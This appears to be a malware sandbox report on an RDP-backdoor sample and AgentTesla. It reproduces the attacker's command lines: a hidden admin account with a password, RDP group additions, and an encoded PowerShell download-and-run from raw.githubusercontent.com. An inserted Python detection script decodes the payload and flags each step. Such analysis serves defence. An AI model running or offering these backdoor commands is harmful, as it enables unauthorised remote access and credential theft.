"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
C:\Windows\system32\net.exe
net start rdpdr
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
C:\Windows\system32\cmd.exe
cmd /c net start TermService
C:\Windows\system32\net.exe
net start TermService
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc MklbaCCd /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc MklbaCCd /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc MklbaCCd /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" HGNBWBGW$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" HGNBWBGW$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" HGNBWBGW$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc MklbaCCd
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc MklbaCCd
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc MklbaCCd
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.speedtest.net | udp |
| US | 104.17.148.22:80 | www.speedtest.net | tcp |
| US | 8.8.8.8:53 | c.speedtest.net | udp |
| US | 151.101.194.219:443 | c.speedtest.net | tcp |
| US | 8.8.8.8:53 | speedtest-london.its-tg.net | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.17.104.in-addr.arpa | udp |
| GB | 212.82.94.119:8080 | speedtest-london.its-tg.net | tcp |
| US | 8.8.8.8:53 | ldnspeedtest.rackdog.com | udp |
| GB | 78.108.219.111:8080 | ldnspeedtest.rackdog.com | tcp |
| US | 8.8.8.8:53 | speed.uk.lon.m247.ro | udp |
| GB | 176.10.82.138:8080 | speed.uk.lon.m247.ro | tcp |
| US | 8.8.8.8:53 | speedtest.brightstar.cloud | udp |
| US | 8.8.8.8:53 | 219.194.101.151.in-addr.arpa | udp |
| GB | 77.108.131.20:8080 | speedtest.brightstar.cloud | tcp |
| US | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| US | 8.8.8.8:53 | 119.94.82.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.219.108.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.82.10.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.131.108.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
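The Processes and Network sections above together describe one procedure: the dropped rfxvmt.dll has its ACL rewritten with takeown/icacls, the RDP listener is moved to 0x1C21 (port 7201), TermService's ServiceDLL is pointed at C:\Windows\branding\mediasrv.png, fEnableWddmDriver is forced to 0, NETWORK SERVICE (the account TermService runs as, SID S-1-5-20, which is why the registry and temp-file activity lands under HKEY_USERS\S-1-5-20 and ServiceProfiles\NetworkService) and a new WgaUtilAcc account are added to Administrators and Remote Desktop Users, and a final -enc PowerShell fetches a script from raw.githubusercontent.com, which accounts for the speedtest traffic. The script below is an added example, not sandbox output and not the malware's own code: it decodes the -enc argument (base64 of UTF-16LE text) and runs regex rules over the report's own command lines, embedded as a constructed sample. The rule names and the sample list are this example's own.

```python
"""Triage the process list of this report: decode the -enc PowerShell
argument and flag the RDP-backdoor installation steps.

Added example for this page; it is not sandbox output and not the
malware's own code. The command lines are copied from the Processes
section and embedded as a constructed sample so the script runs offline.
"""
import base64
import re

# The -enc argument exactly as it appears in the Processes section.
ENC_PAYLOAD = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0"
    "ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEA"
    "dwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0"
    "AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA"
)

# Constructed sample: one entry per distinct command from the Processes section.
SAMPLE_CMDLINES = [
    '"powershell.exe" -ep bypass & \'C:\\Users\\Admin\\AppData\\Local\\Temp\\\\ready.ps1\'',
    r'"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll',
    r'"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    "net.exe user WgaUtilAcc 000000 /del",
    "net.exe user WgaUtilAcc MklbaCCd /add",
    'net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD',
    'net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD',
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc " + ENC_PAYLOAD,
    "wmic path win32_VideoController get name",
]

# -e, -ec, -enc, -EncodedCommand: PowerShell accepts any unambiguous prefix.
ENC_FLAG = re.compile(r'(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)', re.I)
URL_RE = re.compile(r'https?://[^\s"\'()]+')


def decode_encoded_command(cmdline):
    """Return the script behind -enc (base64 of UTF-16LE text), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode("utf-16-le")


def _service_dll(m):
    dll = m["dll"]
    # The legitimate value is %SystemRoot%\System32\termsrv.dll.
    return None if dll.lower().endswith("termsrv.dll") else f"TermService ServiceDLL set to {dll}"


def _rdp_port(m):
    port = int(m["val"], 0)  # base 0 parses 0x1C21 and plain decimal alike
    return None if port == 3389 else f"RDP-Tcp PortNumber set to {port} (default 3389)"


# (rule name, pattern, describe(match) -> detail, or None to suppress)
RULES = [
    ("termservice_dll_replaced",
     re.compile(r'reg(?:\.exe)?"?\s+add\s+"?[^"\s]*TermService\\parameters"?\s+/v\s+ServiceDLL\b'
                r'.*?/d\s+"?(?P<dll>[^"\s]+)', re.I),
     _service_dll),
    ("rdp_port_changed",
     re.compile(r'RDP-Tcp"?\s+/v\s+PortNumber\b.*?/d\s+(?P<val>0x[0-9a-f]+|\d+)', re.I),
     _rdp_port),
    ("rdp_wddm_policy",
     re.compile(r'/v\s+fEnableWddmDriver\b.*?/d\s+(?P<val>\d+)', re.I),
     lambda m: f"Terminal Services policy fEnableWddmDriver set to {m['val']}"),
    ("privileged_group_add",
     re.compile(r'net(?:1|\.exe)?"?\s+localgroup\s+"?(?P<group>Administrators|Remote Desktop Users)"?'
                r'\s+"?(?P<member>[^"/]+?)"?\s+/add', re.I),
     lambda m: f"{m['member']} added to {m['group']}"),
    ("local_account_change",
     re.compile(r'net(?:1|\.exe)?"?\s+user\s+(?P<name>\S+)\s+\S+\s+/(?P<op>add|del)\b', re.I),
     lambda m: f"local account {m['name']} {'created' if m['op'].lower() == 'add' else 'deleted'}"),
    ("system32_acl_change",
     re.compile(r'(?P<tool>takeown|icacls)(?:\.exe)?"?\s+(?:/A\s+/F\s+)?"?(?P<file>[^"\s/]+)', re.I),
     lambda m: f"{m['tool']} run against {m['file']}"),
]


def triage(cmdlines):
    """Apply the decoder and every rule to each command line; return (rule, detail) pairs."""
    findings = []
    for line in cmdlines:
        script = decode_encoded_command(line)
        if script is not None:
            findings.append(("encoded_powershell", script))
            findings.extend(("remote_script_fetch", u) for u in URL_RE.findall(script))
        for name, pattern, describe in RULES:
            m = pattern.search(line)
            detail = describe(m) if m else None
            if detail:
                findings.append((name, detail))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_CMDLINES):
        print(f"{rule:26} {detail}")
```

Run as-is it prints one finding per installation step; feed it the command lines of a real process log (EDR telemetry, Sysmon event 1) instead of SAMPLE_CMDLINES to hunt for the same sequence. The ServiceDLL rule stays silent on the legitimate termsrv.dll value so that a routine reg add does not fire, and the port rule decodes hex because reg.exe accepts 0x-prefixed REG_DWORD data, which is how the report's 0x1C21 (7201) is written.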
Files
memory/1280-0-0x00007FFE4CDD3000-0x00007FFE4CDD5000-memory.dmp
memory/1280-1-0x000001E698000000-0x000001E6982B0000-memory.dmp
memory/1280-2-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1280-3-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1280-4-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1280-5-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-8-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-9-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-20-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-15-0x000002A243710000-0x000002A243732000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1li5pnz.1g2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/1112-25-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
\??\c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.cmdline
| MD5 | 5611bbde429b74ef2dc6da79cf53e8e9 |
| SHA1 | 63ab37813a0a8d755718fc71c94738237c2ab07d |
| SHA256 | b83e14d3ac77ca35ac8564be8e8c9a06729464401de58ede609478f225a62c88 |
| SHA512 | 89a2271446c7ff37c9b647ee65256df60d045d09c071b53eba3be9149400409755132ccb03957b497fc74be8579d3e7bd0b1928fed805ac9256e4401af4bf74b |
C:\Users\Admin\AppData\Local\Temp\RES81BF.tmp
| MD5 | ce311d3761124dfec931c8891cd8203c |
| SHA1 | 40171b2d366328f2a3b08fae9285b070cb3dab10 |
| SHA256 | 3c133f27256a81da4f34f49936d8e091164804ba1151d8e564dcd5f4a95d0355 |
| SHA512 | fe10a442daeaefb4e38f91dac4075140be117781a3f832fb7093d1721e2516b8bd123f48d061b773b4a6e58c8fdd92682ff9d5277a421c8ba16bd4c635d209a7 |
\??\c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\CSCE6608685DB46447B9E103BC3DF145243.TMP
| MD5 | 96ab50dcc33e9c7da41729d77a34418d |
| SHA1 | 715d4e92a5d5de43aafc09daa3da5ec758e393fd |
| SHA256 | a80315752e147655b3802f7e6278ac832b76b920e02cb6f8719dd30fa4d69474 |
| SHA512 | f9889b402e65789024b5d0ad3435e1a9041a71d00124c32810629cf198866ef9d0689638eec3a95b49032163f4d6f4f28eae352426caed65f406d90b2f979bec |
memory/1112-35-0x000002A229540000-0x000002A229548000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.dll
| MD5 | 907f6595ecff1e17928168a31319719c |
| SHA1 | 1137bdbab8f3aa1d72557022aca73d89a6839da6 |
| SHA256 | 16bdd3fc84468b98512b57b162277348bbcf44ac3cab00eb8bac013e84b6da1e |
| SHA512 | efc906e886d295f072dcd7323feed2f27e1d674c87f45134809565407a84b41b44b5adc56f267cc9da55afad7bd4ef50e28bfc969395f28f162753847c950844 |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1112-38-0x000002A243D00000-0x000002A243E76000-memory.dmp
memory/1112-39-0x000002A244090000-0x000002A24429A000-memory.dmp
memory/1280-49-0x00007FFE4CDD3000-0x00007FFE4CDD5000-memory.dmp
memory/1280-50-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-70-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
C:\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
C:\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1112-89-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-90-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
memory/1112-100-0x00007FFE4CDD0000-0x00007FFE4D891000-memory.dmp
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIAD92.tmp
Analysis: behavioral2
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:46 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 149s |
| Max time network | 150s |
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1940 set thread context of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 1940 wrote to memory of 1540 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\Order.exe | "C:\Users\Admin\AppData\Local\Temp\Order.exe" |
| C:\Users\Admin\AppData\Local\Temp\Order.exe | "C:\Users\Admin\AppData\Local\Temp\Order.exe" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:45 |
| Platform | win7-20241023-en |
| Max time kernel | 148s |
| Max time network | 122s |
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\hZpzJs = "C:\\Users\\Admin\\AppData\\Roaming\\hZpzJs\\hZpzJs.exe" | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2952 set thread context of 2184 | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | C:\Users\Admin\AppData\Local\Temp\87597.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Processes
| Process | Command Line |
| C:\Users\Admin\AppData\Local\Temp\87597.exe | "C:\Users\Admin\AppData\Local\Temp\87597.exe" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\emoGDf" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5EE2.tmp" |
| C:\Users\Admin\AppData\Local\Temp\87597.exe | "C:\Users\Admin\AppData\Local\Temp\87597.exe" |
| C:\Users\Admin\AppData\Local\Temp\87597.exe | "C:\Users\Admin\AppData\Local\Temp\87597.exe" |
Network
Files
C:\Users\Admin\AppData\Local\Temp\tmp5EE2.tmp
Analysis: behavioral6
Detonation Overview
| Field | Value |
| Submitted | 2024-11-21 20:43 |
| Reported | 2024-11-21 20:45 |
| Platform | win10v2004-20241007-en |
| Max time kernel | 148s |
| Max time network | 149s |
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\87597.exe | N/A |
